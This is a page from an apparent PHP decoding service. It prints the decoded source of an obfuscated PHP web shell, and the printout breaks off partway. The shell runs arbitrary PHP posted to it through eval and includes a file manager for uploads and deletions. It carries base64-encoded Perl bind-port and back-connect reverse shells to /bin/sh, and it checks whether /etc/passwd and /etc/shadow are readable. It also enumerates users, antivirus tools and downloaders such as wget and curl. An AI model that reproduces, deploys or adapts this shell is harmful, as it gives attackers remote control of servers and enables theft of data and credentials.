Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto ca1d9; a186c: function actionRC() { if (!@$_POST['p1']) { $a = array("uname" => php_..
Decoded Output download
<? goto ca1d9; a186c: function actionRC() { if (!@$_POST['p1']) { $a = array("uname" => php_uname(), "php_version" => phpversion(), "nWfzh_version" => nWfzh_VERSION, "safemode" => @ini_get('safe_mode')); echo serialize($a); } else { eval($_POST['p1']); } } goto E3386; Bc7b6: function nWfzhViewSize($s) { if (is_int($s)) { $s = sprintf("%u", $s); } if ($s >= 1073741824) { return sprintf('%1.2f', $s / 1073741824) . ' GB'; } elseif ($s >= 1048576) { return sprintf('%1.2f', $s / 1048576) . ' MB'; } elseif ($s >= 1024) { return sprintf('%1.2f', $s / 1024) . ' KB'; } else { return $s . ' B'; } } goto A8d99; dd1cc: $default_use_ajax = true; goto Bef43; A74ac: $home_cwd = @getcwd(); goto A8b79; db69a: function actionFilesMan() { goto Ccac1; F939b: $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => nWfzhPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i])); goto b2f40; Faff5: aeff8: goto E2f27; cbedb: if (!empty($_COOKIE['act']) && @count($_COOKIE['f']) && ($_COOKIE['act'] == 'zip' || $_COOKIE['act'] == 'tar')) { echo "file name: <input type=text name=p2 value='nWfzh_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz') . "'> "; } goto a3d24; F5821: a28fe: goto Bcf93; dd724: d5238: goto E565d; b3bef: goto a28fe; goto Faff5; C4848: $sort = array('name', 1); goto efa34; B6d62: nWfzhHeader(); goto aaf1c; ab0c5: function nWfzhCmp($a, $b) { if ($GLOBALS['sort'][0] != 'size') { return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1); } else { return ($a['size'] < $b['size'] ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1); } } goto A8402; b2f40: if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) { $files[] = array_merge($tmp, array('type' => 'file')); } elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); } elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array('type' => 'dir')); } goto E9809; Fc18e: global $sort; goto C4848; D343d: nWfzhFooter(); goto F4aca; be11e: $i++; goto b3bef; a76db: echo "<script>
function sa() {
for(i=0;i<d.files.elements.length;i++)
if(d.files.elements[i].type == 'checkbox')
d.files.elements[i].checked = d.files.elements[0].checked;
}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th><th>Actions</th></tr>"; goto f2f43; b89a5: $gr = @posix_getgrgid(@filegroup($dirContent[$i])); goto F939b; c27c1: if (!empty($_POST['p1'])) { goto d968b; d968b: switch ($_POST['p1']) { case 'uploadFile': if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) { echo "Can't upload file!"; } goto f71d4; case 'mkdir': if (!@mkdir($_POST['p2'])) { echo "Can't create new dir"; } goto f71d4; case 'delete': goto c57c9; e2105: goto f71d4; goto ba991; A4f66: if (is_array(@$_POST['f'])) { foreach ($_POST['f'] as $f) { goto D1772; e81c1: eaff4: goto A6fec; d7293: if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } goto e81c1; Bcd3c: $f = urldecode($f); goto d7293; D1772: if ($f == '..') { goto eaff4; } goto Bcd3c; A6fec: } Fd7c5: } goto e2105; c57c9: function deleteDir($path) { goto ab77b; d08fe: @rmdir($path); goto Ee907; Dc601: F8536: goto ccf0a; cee39: closedir($dh); goto d08fe; fe41a: goto F8536; goto acf14; D7554: if (basename($item) == ".." || basename($item) == ".") { goto F8536; } goto Cf727; ccf0a: if (!(($item = readdir($dh)) !== false)) { goto Cdb7d; } goto F77f7; Cf727: $type = filetype($item); goto A77b8; F77f7: $item = $path . $item; goto D7554; A77b8: if ($type == "dir") { deleteDir($item); } else { @unlink($item); } goto fe41a; acf14: Cdb7d: goto cee39; ab77b: $path = substr($path, -1) == '/' ? $path : $path . '/'; goto E8970; E8970: $dh = opendir($path); goto Dc601; Ee907: } goto A4f66; ba991: case 'paste': goto b19fa; b25bd: setcookie('f', '', time() - 3600); goto Df432; b19fa: if ($_COOKIE['act'] == 'copy') { goto F711b; cbdcb: foreach ($_COOKIE['f'] as $f) { copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']); Fefb7: } goto Eb544; Eb544: Bd36b: goto Ec02c; F711b: function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { goto A96ec; A96ec: mkdir($d . $s); goto Bc253; aaaea: B63e1: goto a6a07; ed1b9: if (!(($f = @readdir($h)) !== false)) { goto B63e1; } goto D2541; D2541: if ($f != "." and $f != "..") { copy_paste($c . $s . '/', $f, $d . $s . '/'); } goto C3f36; e7bb5: C0487: goto ed1b9; Bc253: $h = @opendir($c . $s); goto e7bb5; C3f36: goto C0487; goto aaaea; a6a07: } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } goto cbdcb; Ec02c: } elseif ($_COOKIE['act'] == 'move') { goto b5fc0; Df7a3: feac0: goto a4f10; Cad98: foreach ($_COOKIE['f'] as $f) { @rename($_COOKIE['c'] . $f, $GLOBALS['cwd'] . $f); fc84b: } goto Df7a3; b5fc0: function move_paste($c, $s, $d) { if (is_dir($c . $s)) { goto Aba7b; Cb962: if (!(($f = @readdir($h)) !== false)) { goto ad3fd; } goto C215c; Bf5dc: Fe5cf: goto Cb962; F1c56: $h = @opendir($c . $s); goto Bf5dc; C0857: ad3fd: goto dc189; Aba7b: mkdir($d . $s); goto F1c56; C215c: if ($f != "." and $f != "..") { copy_paste($c . $s . '/', $f, $d . $s . '/'); } goto c4a2b; c4a2b: goto Fe5cf; goto C0857; dc189: } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } goto Cad98; a4f10: } elseif ($_COOKIE['act'] == 'zip') { if (class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { goto Eb134; E85af: foreach ($_COOKIE['f'] as $f) { goto Febbb; b82e4: f05e5: goto D8271; Febbb: if ($f == '..') { goto f05e5; } goto ade5b; ade5b: if (@is_file($_COOKIE['c'] . $f)) { $zip->addFile($_COOKIE['c'] . $f, $f); } elseif (@is_dir($_COOKIE['c'] . $f)) { goto D82d9; d87d8: foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); Fd1a6: } goto F5233; F5233: A749c: goto b5880; D82d9: $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/', FilesystemIterator::SKIP_DOTS)); goto d87d8; b5880: } goto b82e4; D8271: } goto D2595; eb3c3: chdir($GLOBALS['cwd']); goto Cf156; Cf156: $zip->close(); goto e2b0b; D2595: B2ea5: goto eb3c3; Eb134: chdir($_COOKIE['c']); goto E85af; e2b0b: } } } elseif ($_COOKIE['act'] == 'unzip') { if (class_exists('ZipArchive')) { goto Bf863; F4820: foreach ($_COOKIE['f'] as $f) { if ($zip->open($_COOKIE['c'] . $f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } b85f2: } goto Bc7f8; Bc7f8: ef911: goto E3f31; Bf863: $zip = new ZipArchive(); goto F4820; E3f31: } } elseif ($_COOKIE['act'] == 'tar') { goto f4d1b; D6add: nWfzhEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); goto d0f01; D226c: $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); goto D6add; f4d1b: chdir($_COOKIE['c']); goto D226c; d0f01: chdir($GLOBALS['cwd']); goto Ccd5c; Ccd5c: } goto f3edd; Df432: goto f71d4; goto b4114; f3edd: unset($_COOKIE['f']); goto b25bd; b4114: default: if (!empty($_POST['p1'])) { goto A9bba; F79e8: nWfzhsetcookie('f', serialize(@$_POST['f'])); goto ff241; ff241: nWfzhsetcookie('c', @$_POST['c']); goto df0a0; A9bba: nWfzhsetcookie('act', $_POST['p1']); goto F79e8; df0a0: } goto f71d4; } goto Bfd74; Cc420: f71d4: goto Dfa01; Bfd74: F4212: goto Cc420; Dfa01: } goto B6d62; d70eb: $dirContent = nWfzhScandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']); goto D79f0; E565d: echo "<tr><td colspan=7>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'>
<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; goto b3c20; E2f27: $GLOBALS['sort'] = $sort; goto ab0c5; Ccac1: if (!empty($_COOKIE['f'])) { $_COOKIE['f'] = @unserialize($_COOKIE['f']); } goto c27c1; D79f0: if ($dirContent === false) { goto Feebd; Feebd: echo 'Can\'t open this folder!'; goto a3454; D2bb1: return; goto c59cf; a3454: nWfzhFooter(); goto D2bb1; c59cf: } goto Fc18e; B1dac: foreach ($files as $f) { goto a44af; D1a68: d59a1: goto da8bf; b892a: $l = $l ? 0 : 1; goto D1a68; a44af: echo '<tr' . ($l ? ' class=l1' : '') . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td><td><a href=# onclick="' . ($f['type'] == 'file' ? 'g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" ' . (empty($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td><td>' . ($f['type'] == 'file' ? nWfzhViewSize($f['size']) : $f['type']) . '</td><td>' . $f['modify'] . '</td><td>' . $f['owner'] . '/' . $f['group'] . '</td><td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td><td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . ($f['type'] == 'file' ? ' <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>'; goto b892a; da8bf: } goto dd724; f2f43: $dirs = $files = array(); goto f9d4f; E9809: Adb89: goto be11e; D214b: echo "</select> "; goto cbedb; b372f: $l = 0; goto B1dac; C1f15: echo "<option value='tar'>Compress (tar.gz)</option>"; goto E9a49; b008c: $files = array_merge($dirs, $files); goto b372f; c7bea: usort($dirs, "nWfzhCmp"); goto b008c; A8402: usort($files, "nWfzhCmp"); goto c7bea; efa34: if (!empty($_POST['p1'])) { if (preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) { $sort = array($match[1], (int) $match[2]); } } goto a76db; a3d24: echo "<input type='submit' value='>>'></td></tr></form></table></div>"; goto D343d; Ae099: $i = 0; goto F5821; f9d4f: $n = count($dirContent); goto Ae099; b3c20: if (class_exists('ZipArchive')) { echo "<option value='zip'>Compress (zip)</option><option value='unzip' selected>Uncompress (unzip)</option>"; } goto C1f15; aaf1c: echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; goto d70eb; e44bf: $ow = @posix_getpwuid(@fileowner($dirContent[$i])); goto b89a5; Bcf93: if (!($i < $n)) { goto aeff8; } goto e44bf; E9a49: if (!empty($_COOKIE['act']) && @count($_COOKIE['f'])) { echo "<option value='paste'>Paste / Compress</option>"; } goto D214b; F4aca: } goto F6ac2; D7cf8: $auth_pass = ""; goto f5f32; C2e1c: function actionNetwork() { goto F81f6; e4494: $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; goto f27fa; F81f6: nWfzhHeader(); goto A3a58; a9fd6: echo '</div>'; goto e0735; A3a58: $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; goto e4494; ca3b6: if (isset($_POST['p1'])) { goto A8fdb; b9168: if ($_POST['p1'] == 'bcp') { goto Fe517; Df407: sleep(1); goto c902c; c902c: echo "<pre class=ml1>{$out}
" . nWfzhEx("ps aux | grep bc.pl") . "</pre>"; goto f2dc2; dedcc: $out = nWfzhEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &"); goto Df407; f2dc2: unlink("/tmp/bc.pl"); goto Cc342; Fe517: cf("/tmp/bc.pl", $back_connect_p); goto dedcc; Cc342: } goto C60f0; E544d: if ($_POST['p1'] == 'bpp') { goto Af260; Af260: cf("/tmp/bp.pl", $bind_port_p); goto c22d9; c22d9: $out = nWfzhEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &"); goto e3ed6; B58c0: echo "<pre class=ml1>{$out}
" . nWfzhEx("ps aux | grep bp.pl") . "</pre>"; goto E3987; E3987: unlink("/tmp/bp.pl"); goto dafc3; e3ed6: sleep(1); goto B58c0; dafc3: } goto b9168; A8fdb: function cf($f, $t) { $w = @fopen($f, "w") or @function_exists('file_put_contents'); if ($w) { @fwrite($w, @base64_decode($t)); @fclose($w); } } goto E544d; C60f0: } goto a9fd6; f27fa: echo "<h1>Network tools</h1><div class=content>
<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
<span>Bind port to /bin/sh [perl]</span><br/>
Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
</form>
<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
<span>Back-connect [perl]</span><br/>
Server: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
</form><br>"; goto ca3b6; e0735: nWfzhFooter(); goto De226; De226: } goto a186c; Bef43: $default_charset = 'Windows-1251'; goto Db647; D5f2e: function nWfzhLogin() { die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"); } goto cc88d; f29b6: if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) { call_user_func('action' . $_POST['a']); } goto a0955; A8d99: function nWfzhPerms($p) { goto Ca4d0; B2970: $i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-'); goto A50e4; d0e9c: return $i; goto D0b65; d31c5: $i .= $p & 0x20 ? 'r' : '-'; goto A6434; d8ccc: $i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-'); goto d31c5; C016f: $i .= $p & 0x100 ? 'r' : '-'; goto A44b9; E9cf3: $i .= $p & 0x2 ? 'w' : '-'; goto B9fef; A6434: $i .= $p & 0x10 ? 'w' : '-'; goto B2970; A44b9: $i .= $p & 0x80 ? 'w' : '-'; goto d8ccc; A50e4: $i .= $p & 0x4 ? 'r' : '-'; goto E9cf3; Ca4d0: if (($p & 0xc000) == 0xc000) { $i = 's'; } elseif (($p & 0xa000) == 0xa000) { $i = 'l'; } elseif (($p & 0x8000) == 0x8000) { $i = '-'; } elseif (($p & 0x6000) == 0x6000) { $i = 'b'; } elseif (($p & 0x4000) == 0x4000) { $i = 'd'; } elseif (($p & 0x2000) == 0x2000) { $i = 'c'; } elseif (($p & 0x1000) == 0x1000) { $i = 'p'; } else { $i = 'u'; } goto C016f; B9fef: $i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-'); goto d0e9c; D0b65: } goto D12f4; a892c: if (get_magic_quotes_gpc()) { goto A5b2c; Aaa8c: $_COOKIE = nWfzhstripslashes($_COOKIE); goto fea58; Cdeca: $_POST = nWfzhstripslashes($_POST); goto Aaa8c; A5b2c: function nWfzhstripslashes($array) { return is_array($array) ? array_map('nWfzhstripslashes', $array) : stripslashes($array); } goto Cdeca; fea58: } goto D5f2e; b7dff: function actionSecInfo() { goto b823e; A7c3c: nWfzhFooter(); goto f73ac; Dad9c: if (function_exists('mysql_get_client_info')) { $temp[] = "MySql (" . mysql_get_client_info() . ")"; } goto eed2f; B98fa: if (function_exists('apache_get_modules')) { nWfzhSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); } goto e2178; eaeff: if (function_exists('pg_connect')) { $temp[] = "PostgreSQL"; } goto e6c67; A7fed: echo '<h1>Server security information</h1><div class=content>'; goto fa164; a7ecd: echo '<br>'; goto be235; f277b: nWfzhSecParam('Server software', @getenv('SERVER_SOFTWARE')); goto B98fa; d2f9e: $temp = array(); goto Dad9c; eed2f: if (function_exists('mssql_connect')) { $temp[] = "MSSQL"; } goto eaeff; be235: if ($GLOBALS['os'] == 'nix') { goto d5445; Ee6ae: nWfzhSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>" : 'no'); goto E98f0; F00c2: if (!$GLOBALS['safe_mode']) { goto fd42e; F6dcb: nWfzhSecParam('Userful', implode(', ', $temp)); goto B3d7f; D0a44: if (isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { goto Bca45; f3f6a: goto e85ed; goto D1ff0; db6aa: echo '<br/>'; goto a2565; a8fe9: $uid = @posix_getpwuid($_POST['p2']); goto D75c2; Bbb5b: e85ed: goto a5d77; a2565: nWfzhSecParam('Users', $temp); goto Fb32b; a5d77: if (!($_POST['p2'] <= $_POST['p3'])) { goto Cf8db; } goto a8fe9; D75c2: if ($uid) { $temp .= join(':', $uid) . "
"; } goto fc73c; D1ff0: Cf8db: goto db6aa; fc73c: Bed8d: goto c4f83; c4f83: $_POST['p2']++; goto f3f6a; Bca45: $temp = ""; goto Bbb5b; Fb32b: } goto a97d3; e40fe: echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>'; goto D0a44; Ae986: $temp = array(); goto f3c28; D4e9d: echo '<br>'; goto b15cf; df4a3: foreach ($userful as $item) { if (nWfzhWhich($item)) { $temp[] = $item; } B0aac: } goto D0288; f3c28: foreach ($downloaders as $item) { if (nWfzhWhich($item)) { $temp[] = $item; } e3c6f: } goto Fcaee; E74dc: nWfzhSecParam('Downloaders', implode(', ', $temp)); goto E0bdf; Fcaee: b8b9d: goto E74dc; E0bdf: echo '<br/>'; goto d304e; d304e: nWfzhSecParam('HDD space', nWfzhEx('df -h')); goto a49e1; a49e1: nWfzhSecParam('Hosts', @file_get_contents('/etc/hosts')); goto e40fe; B759a: $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror'); goto D4e9d; D4689: nWfzhSecParam('Danger', implode(', ', $temp)); goto Ae986; a1536: Efb4b: goto D4689; B3d7f: $temp = array(); goto c49b5; D0288: Ade6c: goto F6dcb; b15cf: $temp = array(); goto df4a3; c49b5: foreach ($danger as $item) { if (nWfzhWhich($item)) { $temp[] = $item; } a174e: } goto a1536; b0e98: $danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja'); goto B759a; fd42e: $userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl'); goto b0e98; a97d3: } goto fa80a; d5445: nWfzhSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no'); goto Ee6ae; Fdd3e: nWfzhSecParam('Distr name', @file_get_contents('/etc/issue.net')); goto F00c2; E98f0: nWfzhSecParam('OS version', @file_get_contents('/proc/version')); goto Fdd3e; fa80a: } else { goto a1e81; e84df: nWfzhSecParam('User Accounts', nWfzhEx('net user')); goto aff00; a1e81: nWfzhSecParam('OS Version', nWfzhEx('ver')); goto D5d44; D5d44: nWfzhSecParam('Account Settings', nWfzhEx('net accounts')); goto e84df; aff00: } goto e83b7; e2178: nWfzhSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none'); goto c7e2f; F7aa7: nWfzhSecParam('Supported databases', implode(', ', $temp)); goto a7ecd; c731b: nWfzhSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); goto A537f; c7e2f: nWfzhSecParam('Open base dir', @ini_get('open_basedir')); goto E1fe5; A537f: nWfzhSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no'); goto d2f9e; e83b7: echo '</div>'; goto A7c3c; e6c67: if (function_exists('oci_connect')) { $temp[] = "Oracle"; } goto F7aa7; b823e: nWfzhHeader(); goto A7fed; E1fe5: nWfzhSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); goto c731b; fa164: function nWfzhSecParam($n, $v) { $v = trim($v); if ($v) { echo '<span>' . $n . ': </span>'; if (strpos($v, "
") === false) { echo $v . '<br>'; } else { echo '<pre class=ml1>' . $v . '</pre>'; } } } goto f277b; f73ac: } goto fec48; bfd72: function actionSelfRemove() { goto B5bdc; B5bdc: if ($_POST['p1'] == 'yes') { if (@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) { die('Shell has been removed'); } else { echo 'unlink error!'; } } goto Fb5b4; f63e0: echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; goto E53c0; E53c0: nWfzhFooter(); goto Bc63b; Fb5b4: if ($_POST['p1'] != 'yes') { nWfzhHeader(); } goto f63e0; Bc63b: } goto fbb7a; b8976: @ini_set('log_errors', 0); goto e8a7a; d6719: if (!empty($auth_pass)) { if (isset($_POST['pass']) && md5($_POST['pass']) == $auth_pass) { nWfzhsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); } if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || $_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass) { nWfzhLogin(); } } goto a7327; fec48: function actionPhp() { goto Fb873; d7e82: if (isset($_POST['p2']) && $_POST['p2'] == 'info') { goto Bef6c; F7dad: phpinfo(); goto Cdc81; ee5c3: ob_start(); goto F7dad; Bef6c: echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>'; goto ee5c3; Cdc81: $tmp = ob_get_clean(); goto e70b8; e70b8: $tmp = preg_replace(array('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!<img[^>]+>!msiU'), array('', '.e, .v, .h, .h th {$1}', ''), $tmp); goto d5e23; d5e23: echo str_replace('<h1', '<h2', $tmp) . '</div><br>'; goto cb357; cb357: } goto b2015; Fb873: if (isset($_POST['ajax'])) { goto Ed118; Ed118: nWfzhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto c18e1; b05b8: eval($_POST['p1']); goto ac646; a4397: echo strlen($temp), "
", $temp; goto Ff4b6; c18e1: ob_start(); goto b05b8; ac646: $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
\'") . "';
"; goto a4397; Ff4b6: exit; goto C6fa0; C6fa0: } goto A2eb1; A2eb1: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { nWfzhsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto c0171; B1ebc: echo ' <input type=checkbox name=ajax value=1 ' . ($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX</form><pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml1>'; goto D4a27; f53a1: echo '</pre></div>'; goto Aa97c; Aa97c: nWfzhFooter(); goto F3620; c0171: nWfzhHeader(); goto d7e82; D4a27: if (!empty($_POST['p1'])) { goto D8857; D8857: ob_start(); goto F9711; a5080: echo htmlspecialchars(ob_get_clean()); goto E325e; F9711: eval($_POST['p1']); goto a5080; E325e: } goto f53a1; b2015: echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><input type=submit value=Eval style="margin-top:5px">'; goto B1ebc; F3620: } goto db69a; F6ac2: function actionStringTools() { goto A5f75; E26f9: echo "</pre></div><br><h1>Search files:</h1><div class=content>
<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS['cwd']) . "' style='width:100%'></td></tr>
<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
<tr><td></td><td><input type='submit' value='>>'></td></tr>
</table></form>"; goto C5289; b07ab: foreach ($stringTools as $k => $v) { echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>"; Dcb22: } goto E55df; d44af: if (isset($_POST['ajax'])) { goto Fd5b0; Eedd2: echo strlen($temp), "
